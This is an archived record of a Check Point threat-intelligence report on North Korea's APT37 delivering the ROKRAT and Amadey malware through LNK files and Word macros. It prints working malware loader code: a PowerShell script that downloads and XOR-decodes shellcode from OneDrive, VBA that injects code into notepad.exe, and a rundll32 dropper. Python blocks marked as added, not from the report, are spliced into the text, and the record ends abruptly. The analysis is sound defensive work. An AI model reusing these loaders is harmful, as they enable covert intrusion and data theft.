{
	"id": "009464f7-8cba-445a-941c-07e45e7d1ed8",
	"created_at": "2026-04-09T02:22:42.711455Z",
	"updated_at": "2026-04-10T03:38:06.618393Z",
	"deleted_at": null,
	"sha1_hash": "7e612877e5c674dba43770826efbaad4e12f46f3",
	"title": "Chain Reaction: ROKRAT’s Missing Link",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 179411,
	"plain_text": "Chain Reaction: ROKRAT’s Missing Link\r\nBy etal\r\nPublished: 2023-05-01 · Archived: 2026-04-09 02:05:39 UTC\r\nKey findings\r\nCheck Point Research (CPR) continues to track the evolution of ROKRAT and its delivery methods.\r\nROKRAT has not changed significantly over the years, but its deployment methods have evolved, now utilizing\r\narchives containing LNK files that initiate multi-stage infection chains. This is another representation of a major\r\ntrend in the threat landscape, where APTs and cybercriminals alike attempt to overcome the blocking of macros from\r\nuntrusted sources. The first sample we will discuss below was first discovered in July 2022, the same month that\r\nMicrosoft began enforcing this new rule.\r\nThe lures used as part of the ROKRAT infections are largely focused on South Korean foreign and domestic affairs.\r\nMost of those lures are in Korean, suggesting the targets are Korean-speaking individuals.\r\nOur findings suggest that various multi-stage infection chains used to eventually load ROKRAT were utilized in other\r\nattacks, leading to the deployment of additional tools affiliated with the same actor. Those tools include another\r\ncustom backdoor, GOLDBACKDOOR, and the commodity malware Amadey.\r\nIntroduction\r\nFrom the many reports on APT37 in recent months, to Mandiant’s announcement on APT43, a lot of attention is currently\r\nfocused on North Korean threat actors – and with good reason. North Korea has a long history of attacking its southern\r\nneighbor, especially by means of cyber warfare which continues today. 
In this article, we describe a cluster of observed\r\nactivity that deploys ROKRAT, a tool previously attributed to a North Korean threat actor commonly referred to as APT37,\r\nInky Squid, RedEyes, Reaper or ScarCruft.\r\nIn previous years, ROKRAT infection chains usually involved a malicious Hangul Word Processor (HWP, a popular\r\ndocument format in South Korea) document with an exploit, or a Microsoft Word document with macros. While some\r\nROKRAT samples still use these techniques, we have observed a shift to delivering ROKRAT with LNK files disguised as\r\nlegitimate documents. This shift is not exclusive to ROKRAT but represents a larger trend that became very popular in 2022.\r\nIn July of that year, Microsoft began blocking macros in Office applications by default in an effort to minimize the spread of\r\nmalware, and the first malware sample we discuss was discovered in the same month.\r\nIn our report, we discuss various infection chains and lures used by APT37 in their recent attacks, and the resulting payloads\r\nof ROKRAT and Amadey. Finally, we dive deeply into a technical analysis of ROKRAT.\r\nWhile we were in the final stages of preparing this blogpost, another report containing a technical analysis of one of the\r\nROKRAT campaigns was published. While it overlaps with our findings to some extent, we believe that our report provides\r\nimportant information about additional campaigns by APT37, as well as a deep analysis of the ROKRAT malware.\r\nBackground\r\nFirst reported by Talos in April 2017, ROKRAT (also known as DOGCALL) has been consistently attributed to APT37.\r\nTypically, this tool was used to target government sectors in South Korea as well as journalists, activists, and North Korean\r\ndefectors. According to the initial report, one of the ROKRAT samples utilized Twitter as its Command and Control (C\u0026C)\r\ninfrastructure, while the other relied on Yandex and Mediafire. 
The latter sample more closely resembles how ROKRAT\r\noperates today, relying on cloud file storage services as a C\u0026C mechanism.\r\nOriginally supporting only Windows, over the years ROKRAT has adapted to other platforms, with macOS and Android\r\nversions discovered in the wild. The macOS version, also known as CloudMensis, was first described by ESET in July 2022.\r\nAlthough Android versions of ROKRAT have existed for a long time, InterLab and S2W both introduced a newer version of\r\nROKRAT on Android, known as RambleOn (Cumulus). All of this demonstrates that this malware is still being actively\r\ndeveloped and distributed.\r\nMany of the tools attributed to APT37 are custom-written tools like ROKRAT, including (but not limited to) the\r\nrecently reported M2RAT, Konni RAT, Chinotto, and GOLDBACKDOOR. However, the actors also use commodity\r\nmalware such as Amadey. Using commodity malware makes it more difficult to attribute the attack to a specific group, as\r\nit’s widely available and anyone can acquire it.\r\nAs documented in recent publications, the threat actors have been active lately. In February, AhnLab reported a new RAT\r\nnamed Map2RAT or M2RAT for short. This RAT utilizes steganography tricks by hiding executables inside JPEG files to\r\nevade detection. In March, Sekoia and ZScaler both published accounts of APT37’s use of phishing sites and PowerShell\r\nbackdoors, the latter of which led to the deployment of another implant named Chinotto.\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 1 of 15\n\nLures and Infection Chains\r\nOver the past four months, we observed multiple infection chains leading to ROKRAT deployment. In most cases, an LNK\r\nfile initiates the infection, although in a few cases a DOC file was used for the same purpose (the method in previous ROKRAT\r\nattacks). 
During our analysis of the ROKRAT infection chain, we came across a similar chain leading to the deployment of\r\nAmadey, a commercial RAT sold in underground forums. Although the nature of the attacks is different, we believe all of\r\nthose were crafted by the same actors.\r\nFigure 1 – Timeline of lures and infection chains.\r\nDecoy LNK Infection Chains\r\nIn April 2022, Stairwell published a detailed analysis of GOLDBACKDOOR, a malware utilized in a targeted attack against\r\nSouth Korean journalists. Stairwell provided a thorough analysis of an infection chain that utilizes large LNK files running\r\nPowerShell, leading to the execution of the newly discovered malware while dropping a decoy document. This technique is\r\na unique implementation of a publicly available tool called EmbedExeLnk.\r\nAlthough first linked to GOLDBACKDOOR, analysis of recent lures tied to APT37 suggests this technique has become a\r\nprominent method used to deliver another tool associated with the same actor, namely ROKRAT. The ROKRAT and\r\nGOLDBACKDOOR loading mechanisms are so similar that differentiating between the two is only possible\r\nupon retrieving the payload.\r\nOver the last few months, we were able to identify multiple lures utilizing this unique implementation delivered in ZIP and\r\nISO archives. Only some of these lures were confirmed to lead to ROKRAT deployment. All of the lures used the theme of\r\nSouth Korean domestic and foreign affairs.\r\nJuly 2022 – National Assembly Committees\r\nThe earliest indication of the above-mentioned infection chain was found in a ZIP file named  (0722)상임위원회 및 상설특별위원회 위원 명단(최종).zip  ( (0722) Standing Committee and Standing Special Committee Member List\r\n(final).zip ). This ZIP file contains an LNK with the same name and looks very similar to the LNK loader that was used\r\nfor GOLDBACKDOOR.\r\nIn this case, a decoy HWP document is dropped and opened. 
The document contains information about committees in the\r\nNational Assembly, the South Korean parliament. Based on the timestamp of the ZIP archive, it appears that the document\r\nbecame publicly available on the National Assembly’s website and was weaponized within a single day. Unfortunately, we\r\nwere not able to get the end payload in this infection chain, though it is highly likely it was either GOLDBACKDOOR or\r\nROKRAT.\r\nFigure 2 – Decoy HWP document about committees in the South Korean National Assembly.\r\nJanuary 2023 – Projects in Libya\r\nAt the beginning of February 2023, we came across another new sample of ROKRAT. This time, the actors used a ZIP\r\narchive, named  projects in Libya.zip , which contains several stolen documents. In the malicious archive, there were\r\nthree benign files called  MFZ Executive Summary Korea.pdf ,  Proposed MOU GTE Korea.docx , and  Proposed MOU GTE\r\nKorea.pdf . The fourth file was a suspiciously large LNK, approximately 42.5 MB, masquerading as a PDF file\r\nnamed  Pipelines Profile (Elfeel- Sharara-Mellitah + Wafa - Mellitah).pdf . Unlike all of the other lures we saw,\r\nthis one was in English.\r\nAll the documents in this archive are connected to the Libyan Oil \u0026 Gas industry. 
The three benign documents are about a\r\nproject involving a Libyan oil company called Geotech Energy and a South Korean consultant company called Tundrabiz.\r\nThe decoy document that is opened after clicking the malicious LNK shows the profiling of an oil pipeline from 2005 by\r\nEnppi, an international contractor that specializes in projects in the oil and gas industries.\r\nFigure 3 – Pipelines Profile (Elfeel- Sharara-Mellitah + Wafa - Mellitah).pdf.\r\nFigure 4 – MFZ Executive Summary Korea.pdf.\r\nApril 2023 – North Korea Diplomacy\r\nAt the beginning of April, we saw a similar infection chain from an ISO file that led to ROKRAT. The sample contained two\r\nmalicious LNKs inside named  북 외교관 선발파견 및 해외공관.lnk  ( Selection and Dispatch of North\r\nKorean Diplomats and Overseas Missions.lnk ) and  북한외교정책결정과정.lnk  ( North Korea foreign policy\r\ndecision-making process.lnk ). Both LNKs contain and drop decoy HWP files, a common document format in\r\nSouth Korea that is widely used by North Korean threat actors to distribute malware. The files are\r\nnamed  230401.hwp  and  230402.hwp , respectively. These names likely indicate the dates April 1 and April 2, 2023, just a\r\nfew days before the ISO archive was discovered. Both decoy documents contain articles regarding diplomacy and policy\r\ndecisions of South Korea toward North Korea.\r\nFigure 5 – North Korea’s Selected and Dispatch of Diplomats and Operation of Overseas Missions article by\r\nChulmin Han, Former North Korean diplomat in Africa (230401.hwp). Automatic translation on the right.\r\nApril 2023 – Korean Association for Public Administration\r\nOn April 19, another pair of LNKs were discovered. 
This time, there was no archive file; the LNKs were uploaded\r\nseparately to VirusTotal and were not given meaningful names. However, based on the pattern we observed, they were\r\nprobably named according to the PDF file they both contain:  2023년도 4월 29일 세미나.pdf  ( April 29, 2023\r\nSeminar.pdf ). This decoy PDF file details a seminar that it claims will happen on April 29, 2023, at the Korean Association\r\nfor Public Administration, and includes a Zoom link and itinerary.\r\nEven though the two LNKs dropped the same document and script, one file was 10 MB and the other nearly 50 MB, due to\r\ndifferent amounts of padding inside the LNK files. Unfortunately, at the time of analysis, the payload hosted on OneDrive\r\nhad already been taken down, so we are unsure of the final payload. However, we believe that it was probably ROKRAT or\r\nGOLDBACKDOOR.\r\nFigure 6 – Lure document 2023년도 4월 29일 세미나.pdf (April 29, 2023 Seminar.pdf).\r\nLNK Infection Chain Analysis\r\nAll of the LNKs discussed above lead to nearly the same infection chain. An example of the infection is depicted below, as\r\ndemonstrated in the “Projects in Libya” archive:\r\nFigure 7 – Infection chain for “Projects in Libya” lure.\r\nClicking the malicious LNK file triggers the execution of a PowerShell script and initiates the following infection chain:\r\n1. The PowerShell extracts a document file from the LNK, drops it to the disk, and then opens it. This file is a decoy to\r\ntrick users into thinking they simply opened a normal PDF or HWP file.\r\n2. 
The PowerShell extracts a BAT script from the LNK, drops it to the disk, and executes it.\r\n$dirPath = Get-Location;\r\nif($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\\Users\\admin\\AppData\\Local\\Temp'};\r\n$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0002A8F60E} | Select-Object -ExpandProperty FullName;\r\n$pdfFile = gc $lnkpath -Encoding Byte -TotalCount 03568692 -ReadCount 03568692;\r\n$pdfPath = 'C:\\Users\\admin\\AppData\\Local\\Temp\\230130.pdf';\r\nsc $pdfPath ([byte[]]($pdfFile | select -Skip 003388)) -Encoding Byte;\r\n\u0026 $pdfPath;\r\n$exeFile = gc $lnkpath -Encoding Byte -TotalCount 03571940 -ReadCount 03571940;\r\n$exePath = 'C:\\Users\\admin\\AppData\\Local\\Temp\\230130.bat';\r\nsc $exePath ([byte[]]($exeFile | select -Skip 03568692)) -Encoding Byte;\r\n\u0026 $exePath;\r\n3. The BAT script executes a new PowerShell instance that downloads a payload from OneDrive, decodes it by taking\r\nthe first byte of the payload as a key, and XORs it with the remainder of the payload.\r\n4. The resulting payload is reflectively injected into PowerShell, causing it to run as a new thread.\r\n5. 
The shellcode decodes the ROKRAT portion of the payload with a four-byte XOR key and executes it.\r\n[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072)\r\n$aa='[DllImport(\"kernel32.dll\")]public static extern IntPtr GlobalAlloc(uint b,uint c);'\r\n$b=Add-Type -MemberDefinition $aa -Name \"AAA\" -PassThru\r\n$abab = '[DllImport(\"kernel32.dll\")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr d);'\r\n$aab=Add-Type -MemberDefinition $abab -Name \"AAB\" -PassThru\r\n$c = New-Object System.Net.WebClient\r\n$d=\"https://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalFOTHZFRV9DVU9iUFdnLXhPZG8xRXFYckU_ZT1BM1QwV\r\n$bb='[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);'\r\n$ccc=Add-Type -MemberDefinition $bb -Name \"BBB\" -PassThru\r\n$ddd='[DllImport(\"kernel32.dll\")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);'\r\n$fff=Add-Type -MemberDefinition $ddd -Name \"DDD\" -PassThru\r\n$e=112\r\ndo {\r\n try {\r\n $c.Headers[\"user-agent\"] = \"connnecting...\"\r\n $xmpw4=$c.DownloadData($d)\r\n $x0 = $b::GlobalAlloc(0x0040, $xmpw4.Length+0x100)\r\n $old = 0\r\n $aab::VirtualProtect($x0, $xmpw4.Length+0x100, 0x40, [ref]$old)\r\n for ($h = 1; $h -lt $xmpw4.Length; $h++)\r\n { [System.Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw4[$h] -bxor $xmpw4[0]) ) }\r\n try { throw 1 }\r\n catch {\r\n $handle=$ccc::CreateThread(0,0,$x0,0,0,0)\r\n $fff::WaitForSingleObject($handle, 500*1000) }\r\n $e=222 }\r\n catch {\r\n sleep 11\r\n $e=112 }\r\n} while($e -eq 112)\r\nClassic ROKRAT Infection Chain\r\nWhile adopting new behavior to keep up with the shifting threat landscape, ROKRAT operators still stick to some old habits.\r\nIn parallel to the newly identified method described above, ROKRAT is still deployed using malicious Word documents.\r\nIn December 2022, a malicious Word document named  사례비_지급의뢰서.doc  ( Case fee_Payment request.doc ) was\r\nsubmitted to VirusTotal. The document itself contains a short form to enter personal and banking information. 
However,\r\ncloser inspection of the document reveals references to the Ministry of Unification, a ministry in the South Korean\r\ngovernment that is responsible for guiding policy with North Korea and dealing with North Korean defectors, with the\r\nultimate goal of reuniting the two countries.\r\nFigure 8 – Infection chain for “Projects in Libya” lure.\r\nOnce the user opens the malicious document and allows the macro to execute, the following infection chain is triggered:\r\n1. The macro checks and ensures it has access to the Visual Basic project by setting the AccessVBOM registry key to\r\nload additional code.\r\n2. The macro decodes a new VBA script, writes it to a new module in the macro, and then executes it. This is done\r\nwithout dropping any of the code to the disk.\r\n3. The second VBA script runs  notepad.exe  and injects shellcode into it.\r\n4. The shellcode runs inside  notepad.exe  and reaches out to OneDrive to download the ROKRAT payload and\r\nexecute it in memory.\r\nsrc_str = Array(\u0026H55, \u0026H8B, \u0026HEC, \u0026H83, \u0026HEC, \u0026H2C, \u0026H50, \u0026HE8, \u0026H4, \u003ctruncated\u003e...\r\n#If Win64 Then\r\n Dim FSO As Object\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n Dim windowsDir As String\r\n windowsDir = FSO.GetSpecialFolder(0)\r\n windowsDir = windowsDir \u0026 \"\\SysWOW64\\notepad.exe\"\r\n ReturnValue = CreateProcessA(0, windowsDir, 0, 0, False, 0, 0, 0, start, proc)\r\n#Else\r\n ReturnValue = CreateProcessA(0, \"notepad.exe\", 0, 0, False, 0, 0, 0, start, proc)\r\n#End If\r\nPID = proc.dwProcessID\r\nIf PID Then hTargetProcHandle = OpenProcess(PROCESS_ALL_ACCESS, False, PID) Else Exit Sub\r\ndwCodeLen = \u0026H800\r\nshellAddr = VirtualAllocEx(hTargetProcHandle, ByVal 0, dwCodeLen, \u0026H3000, PAGE_EXECUTE_READWRITE)\r\nhGlobalMemory = GlobalAlloc(GHND, UBound(src_str))\r\nFor i = LBound(src_str) To UBound(src_str)\r\n bValue = src_str(i)\r\n RtlMoveMemory hGlobalMemory + i, bValue, 1\r\nNext i\r\nDim resultWriteProcess\r\nresultWriteProcess = WriteProcessMemory(hTargetProcHandle, shellAddr, hGlobalMemory, UBound(src_str) + 1, ret)\r\nhThread = CreateRemoteThread(hTargetProcHandle, ByVal 0, 0, shellAddr, 0, 0, 0)\r\nThe infection chain described here is extremely similar to what MalwareBytes reported in January 2021, which also\ndeployed ROKRAT by injecting shellcode into notepad.exe and loading the RAT in memory. However, the samples\ndescribed in the MalwareBytes research had compilation dates from 2019, whereas the new ROKRAT sample we discovered\nappears to have been compiled on December 21, 2022, only six days before the document was submitted to VirusTotal.\nAdditionally, there is another document recently discovered in April 2023 that appears to be part of the same infection chain,\nonly this time the target process for injection is mspaint.exe. The document references a few subjects such as Kim Jong-Un’s potential successor and North Korea’s nuclear weapon capabilities. Unfortunately, at the time of our analysis, the URL\nwas no longer replying to the request to download the payload. 
However, it is highly likely that this document was also\nintended to deliver ROKRAT.\nThe Amadey Connection\nAt the beginning of November 2022, a file called securityMail.zip was submitted to VirusTotal. This ZIP contained two\nLNKs which were both suspiciously large at just under 5 MB. The implementation of PowerShell commands within the two\nLNKs is unique and overlaps only with ROKRAT and GOLDBACKDOOR LNK infections. This specific infection chain,\nhowever, ends up deploying Amadey, a commodity malware available for sale on cybercrime forums. Amadey was linked in\nthe past to Konni, another cluster of activity that aligns with APT37.\nFigure 9 – Infection chain for the “Security Mail” lure.\nOpening either of these LNKs results in a similar flow:\n1. A PowerShell command extracts a decoy HTML file from the LNK and drops it to disk, in a similar manner to\nROKRAT infection chains:\n$dirPath = Get-Location;\n$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0000472484} | Select-Object -ExpandProperty FullName;\nif($lnkpath.length -eq 0) {$dirPath = \\\"$env:temp\\\";$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0000472484} | Select-Object -ExpandProperty FullName;};\n$pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00090300 -ReadCount 00090300;\n$pdfPath = \\\"$env:temp\\securityMail_1031.html\\\";\nsc $pdfPath ([byte[]]($pdfFile | select -Skip 004386)) -Encoding Byte;\n\u0026 $pdfPath;\n$exeFile = gc $lnkpath -Encoding Byte -TotalCount 04662404 -ReadCount 04662404;\n$exePath=\\\"$env:public\\11702.zip\\\";\nsc $exePath ([byte[]]($exeFile | select -Skip 00090300)) -Encoding Byte;\n$shell = new-object -com shell.application;\n$zip = $shell.Namespace($exePath);\nif($zip.items().count -gt 0){\n $executemodule = $env:public + '\\' + $zip.items().item(0).name;\n $shell.Namespace($env:public).CopyHere($zip.items().item(0), 1044) | out-null;\n remove-item -path $exePath -force;\n $batPath=\\\"$env:public\\27868.bat\\\";\n $cmdline=\\\"rundll32.exe `\\\"$executemodule`\\\",Run`r`ndel /f /q %0\\\";\n sc $batPath $cmdline;\n start-process -filepath $batPath -windowstyle hidden;\n}\n2. This PowerShell also extracts a ZIP archive from the LNK, which contains a DLL. The DLL is then dropped to disk\r\nas  mfc100.dll .\r\n3. 
The PowerShell finally extracts a BAT script from the LNK as well, dropping it to disk and executing it.\r\n4. The BAT script runs the DLL with  rundll32.exe  and deletes itself.\r\nrundll32.exe \"C:\\Users\\Public\\mfc100.dll\",Run\r\ndel /f /q %0\r\nAn initial analysis of the DLL file revealed that it is packed with Themida, a commercial code protection solution. After\r\nanalyzing a memory dump of its execution, we were able to confirm that this was in fact Amadey. The decoy HTML file\r\ncontains a fake login page for Kakao Bank, a popular bank in South Korea. Further analysis of the HTML revealed that it is\r\nnot used for password phishing, but to hide the threat actors’ intentions.\r\nFigure 10 – Fake Kakao Bank login page (automatic translation on the right).\r\nROKRAT Technical Analysis\r\nROKRAT is just one of the many custom tools used by this threat actor, but is definitely versatile and powerful. ROKRAT\r\nprimarily focuses on running additional payloads and extensive data exfiltration. It relies on cloud infrastructure for C\u0026C\r\nfunctions, including DropBox, pCloud, Yandex Cloud, and OneDrive. ROKRAT also collects information about the machine\r\nto prevent further infection of unintended victims.\r\nWhile it’s no secret that ROKRAT has not significantly changed in the last few years, this can be attributed to its slick use of\r\nin-memory execution, disguising C\u0026C communication as potentially legitimate cloud communication, and additional layers\r\nof encryption to hinder network analysis and evade network signatures. 
As a result, there are not a lot of recent published\r\narticles about ROKRAT.\r\nGeneral Malware Structure\r\nMost samples of ROKRAT have a very simple WinMain function. All of the samples analyzed so far contain a data\r\ncollection functionality ( CollectMachineData , as seen in Figure 11 below) which is executed before the execution of the\r\nMain RAT thread ( MainRATThread ). This thread initializes the RAT and runs a loop to try and get commands from the\r\nC\u0026C, and then parses and executes them.\r\nThere are two additional functionalities embedded into the WinMain function that we only observed in a subset of the\r\nsamples. The first checks if the RAT is able to write to the TEMP directory ( CheckTemp , as seen in Figure 11 below). The\r\nsecond one creates a thread ( KillCertainProcessesThread ) to kill certain processes linked to previous infection vectors\r\nthat exploited vulnerabilities in Hancom Office.\r\nFigure 11 – An example of a WinMain function in ROKRAT.\r\nVictim Fingerprinting and Evasions\r\nOne of the first functions that ROKRAT calls when it executes is designed to collect data about the infected machine. In this\r\nphase of infection, this is likely to help the attackers distinguish if this is a desired target or not, and then act accordingly.\r\nIn this function (and many others), ROKRAT uses encrypted strings to prevent some of the techniques used from being\r\nvisible to static analysis. 
The information collected here includes whether the program is running under WOW64 (indicating a 32-bit process running on 64-bit Windows), the version of vmtoolsd.exe (the VMware Tools daemon, if installed), SMBIOS data from the registry, and the system BIOS version, also from the registry.\r\nThe RAT also collects the username, machine name, and the full path of the executable in which the RAT is executing. The latter is important because the infection chain usually involves injecting a ROKRAT PE file into an existing process’s memory. In other words, this allows the attackers to see whether ROKRAT is executing in the expected process, such as powershell.exe or notepad.exe. Finally, the function checks whether the executable has permission to create a file for writing under C:\\Windows.\r\nFigure 12 – CollectMachineData collects various information about the infected machine.\r\nWhile a lot of the target’s data is collected in the function mentioned above, there is another data collection function that runs in the context of the main RAT thread before ROKRAT starts accepting commands. This second function calls the IsDebuggerPresent API, storing the result as a character (0 or 1). In addition, it calls a function to grab a screenshot of the machine.\r\nThe data collection carried out in the main thread is executed, and the collected data sent, each time ROKRAT attempts to get commands.\r\nIn this same function, some samples also check whether there is a running process named 360Tray.exe, a process that is part of the antivirus product 360 Total Security. The result is stored in a global Boolean variable and is read by a separate function used to execute shellcode payloads. 
Interestingly, if the process was found, ROKRAT doubles the timeout period it waits for the shellcode to finish running, from 24 seconds to 48 seconds. If the shellcode runs past the timeout period and 360Tray.exe was not previously detected, ROKRAT attempts to terminate the shellcode thread.\r\nAs previously mentioned, some ROKRAT samples execute a thread called KillCertainProcessesThread. This thread kills two processes, gbb.exe and gswin32c.exe, which are responsible for parsing PostScript data in Hancom Office. In the past, ROKRAT samples have come from malicious HWP documents that exploit these processes to gain code execution. Most likely, this is code left over from trying to clean any traces of exploitation from previous campaigns.\r\nInstead of using hardcoded or encrypted strings for these process names, ROKRAT contains a simple hashing algorithm and compares the hash of each process name against a hardcoded integer value. The hash (a djb2 variant over the upper-cased name) is computed as follows, shown here in Python:\r\ndef calculate_hash(process_name):\r\n    hash_value = 5381  # Initial value (the djb2 seed)\r\n    for current_char in process_name.upper():\r\n        hash_value = ord(current_char) + 33 * hash_value\r\n    return hash_value \u0026 0xFFFFFFFF  # Return as a 32-bit integer\r\nC\u0026C Communication\r\nIn each of the ROKRAT samples we analyzed, the malware configuration contained an ID number representing the cloud infrastructure, and the API token to use it. 
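Returning to the process-name hash from the previous subsection: the following is an added example (not code from the Check Point report) that implements the hash matching the way ROKRAT uses it and, going one step beyond the report, brute-forces such constants against a wordlist, which is what an analyst does when a new sample carries values that do not resolve to gbb.exe or gswin32c.exe. The process list, the wordlist and the hash constants themselves are constructed here, not copied from a sample.

```python
# Added example, not code from the Check Point report. ROKRAT's process-name
# hash is the classic djb2 string hash (h = h*33 + c, seed 5381) over the
# upper-cased name, truncated to 32 bits. The process list and wordlist below
# are constructed for illustration; the hash constants are computed here, not
# copied from a sample.

def rokrat_process_hash(name):
    # djb2 over the upper-cased name, kept as an unsigned 32-bit value
    h = 5381
    for ch in name.upper():
        h = (h * 33 + ord(ch)) & 0xFFFFFFFF
    return h


# What a sample carries instead of the plain process names
TARGET_HASHES = {
    rokrat_process_hash('gbb.exe'),
    rokrat_process_hash('gswin32c.exe'),
}


def processes_to_kill(running):
    # Implant side (KillCertainProcessesThread): hash each image name in the
    # process list and act on the ones whose hash matches a constant. Because
    # the name is upper-cased first, the match is case-insensitive.
    return [p for p in running if rokrat_process_hash(p) in TARGET_HASHES]


def resolve_hashes(unknown, candidates):
    # Analyst side: given hash constants pulled from a new sample, hash a
    # wordlist of likely process names and report the ones that resolve.
    table = {rokrat_process_hash(c): c for c in candidates}
    return {h: table[h] for h in unknown if h in table}


if __name__ == '__main__':
    # Constructed process list for a host running Hancom Office
    running = ['explorer.exe', 'Hwp.exe', 'gbb.exe', 'GSWIN32C.EXE', 'notepad.exe']
    print(processes_to_kill(running))
    wordlist = ['gbb.exe', 'gswin32c.exe', '360Tray.exe', 'vmtoolsd.exe']
    print(resolve_hashes(TARGET_HASHES, wordlist))
```

Because the implant upper-cases the name before hashing, a process started as GSWIN32C.EXE is matched just like gswin32c.exe; a wordlist for resolve_hashes therefore does not need case variants, only the image names themselves.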
The ID number can take the following values, corresponding to different cloud providers, as well as a test mode that allows the RAT to communicate with the local machine:\r\n1 – Local machine (no cloud)\r\n3 – Dropbox\r\n4 – pCloud\r\n5 – Yandex\r\nFigure 13 – Switch case statement for the cloud storage provider.\r\nFurther analysis indicates that there are usually two C\u0026C configurations, one used as the primary infrastructure and the second as a backup. In the latest samples we discovered, the primary C\u0026C was pCloud and the secondary was Yandex Cloud.\r\nROKRAT starts by initializing the token and then gets the folder content from the C\u0026C to make sure it has access and the token is valid:\r\nFigure 14 – GET request headers to list a folder directory in pCloud.\r\nThe names of the files that ROKRAT uses are generated from the GetTickCount API and from random values from the rand API, seeded with the time of execution.\r\nROKRAT uploads a file to the server that contains the following information about the victim machine:\r\nHardcoded value 0xBAADFEDE – Used later in the C\u0026C communication\r\nIsDebuggerPresent value\r\nScreenshot image the malware previously saved to the following path: %TEMP%\\\u003c16 hex digits\u003e.tmp\r\nProcesses data – pid:\u003cPID\u003e,name:\u003cprocess name\u003e,path:\u003cfile name\u003e for every running process\r\nTick count\r\nXOR keys – Used for decrypting commands and payloads from the C\u0026C\r\nGenerated filenames – Used later for downloading and executing payloads in certain commands\r\nIsWow64Process flag\r\nWindows version\r\nComputer name\r\nUsername\r\nMachine type – Obtained by querying the SMBiosData registry value under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\mssmbios\\Data\r\nVMware Tools version data\r\nSystem BIOS version\r\nTo further hide its tracks, ROKRAT labels the data collected about the victim’s machine as MP3:\r\nFigure 15 – POST request headers to send encrypted data gathered from the victim machine to pCloud.\r\nFirst, the data is XORed with a random four-byte key. This is why the data begins with the hardcoded four-byte value 0xBAADFEDE: because the attackers know the hardcoded value, they can recover the XOR key by XORing the first four bytes of the XORed data with 0xBAADFEDE. The XORed data is then encrypted with AES-CBC. Finally, the AES key is encrypted with a hardcoded RSA public key, so the payload can only be decrypted with the corresponding RSA private key.\r\nAlthough C\u0026C communication is already protected by HTTPS, ROKRAT takes it a step further by encrypting data uploaded to the C\u0026C with AES. When the malware initializes, it generates two random 16-byte values, which serve as the basis for the AES keys used to encrypt commands and payloads. The malware also comes with a hardcoded 16-byte value, which is then XORed against the two randomized values. 
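The marker-based XOR layer and the AES key derivation described in this paragraph, modelled in Python as an added example (this is not the report’s code, and the AES-CBC and RSA layers that wrap the result are deliberately not reproduced). The byte order of the marker, the repetition of the four-byte key across the buffer, the hardcoded 16-byte constant and the sample victim report are all assumptions or constructed values.

```python
# Added example, not code from the Check Point report: a model of the inner
# layers of ROKRAT's upload format as the report describes them - a fixed
# 0xBAADFEDE marker, a random 4-byte XOR key, and two AES keys derived by
# XORing random 16-byte values with a hardcoded 16-byte constant. The AES-CBC
# and RSA layers that wrap this are not reproduced. Assumptions: the marker is
# stored little-endian, the 4-byte key repeats across the buffer, and the
# hardcoded constant and sample report text below are stand-ins.
import os
from itertools import cycle

MARKER = (0xBAADFEDE).to_bytes(4, 'little')   # assumed byte order
HARDCODED_16 = bytes(range(0x10, 0x20))       # stand-in for the sample's constant


def xor_bytes(data, key):
    # XOR data against the key, repeating the key as often as needed
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def derive_aes_keys(rand_a, rand_b, hardcoded=HARDCODED_16):
    # Two random 16-byte values XORed with the hardcoded value give the
    # command key and the payload key
    if not (len(rand_a) == len(rand_b) == len(hardcoded) == 16):
        raise ValueError('key material must be 16 bytes')
    return xor_bytes(rand_a, hardcoded), xor_bytes(rand_b, hardcoded)


def wrap_victim_data(plain):
    # Implant side: prepend the marker, then XOR the whole buffer with a fresh
    # random 4-byte key that is never transmitted
    key = os.urandom(4)
    return xor_bytes(MARKER + plain, key)


def recover_xor_key(blob):
    # Operator side: the first 4 bytes are marker XOR key, so XORing them with
    # the known marker yields the key. This is a known-plaintext shortcut, not
    # integrity: any 4 bytes produce some key, so nothing here detects tampering
    if len(blob) < 4:
        raise ValueError('blob too short to hold the marker')
    return xor_bytes(blob[:4], MARKER)


def unwrap_victim_data(blob):
    # Undo the XOR layer and strip the marker; what remains is the victim report
    return xor_bytes(blob, recover_xor_key(blob))[4:]


if __name__ == '__main__':
    report = b'pid:1234,name:notepad.exe,path:C:/Windows/notepad.exe'  # constructed
    blob = wrap_victim_data(report)
    print(unwrap_victim_data(blob) == report)
    cmd_key, payload_key = derive_aes_keys(os.urandom(16), os.urandom(16))
    print(cmd_key.hex(), payload_key.hex())
```

Two practical points follow from the model. The XOR layer provides no confidentiality by itself, since anyone holding the buffer recovers the key from its first four bytes; its value to the operator is that each upload differs at the byte level, and the real protection is the AES-CBC layer whose key travels RSA-wrapped. Conversely, an analyst who obtains the AES plaintext (from a memory dump, or with the RSA private key) needs nothing but the marker to strip the XOR layer, which is exactly what recover_xor_key does.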
